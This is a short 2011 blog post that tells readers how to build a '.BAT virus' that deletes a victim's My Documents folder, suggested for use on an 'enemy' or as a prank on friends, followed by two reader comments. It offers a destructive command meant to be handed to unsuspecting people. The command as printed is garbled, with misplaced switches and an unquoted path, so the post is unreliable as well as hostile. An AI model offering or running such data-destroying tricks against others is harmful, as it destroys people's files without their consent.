Monday, October 3, 2011

PC Trick On How To Create A Virus


HERE'S A PC TRICK I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF YOUR ENEMY OR JUST FOR FUN WITH YOUR FRIEND.

The PC Trick is so simple to perform you have to just copy paste the code line given at the end of article. Here's what you should do to perform this computer trick.

1).Open a new NOTEPAD file and then copy the code given below in the red line.

2).Then you have to save the file with whatever name you like,but be sure to save it as a BAT FILE.

3). For example save your file LikeMYVIRUS.BAT. It should have the ending as .BAT.

4).Now if you give this file to some one and if he runs this program then his my document folder automatically deleted.

Code Line is:   rmdir C:\Documents and Settings \S\Q.

That’s all about this pc trick. Make virus by this pc trick and surprise your close friends.

2 comments:

hey........its awesome.....then how can we get back our my documents folder dude...

Dear reader thanks for your interest for this purpose i am going to post a new new article and soon will be posted on my blog with in one day...Read My Next Post On How To Recover Deleted My Document folder....

Post a Comment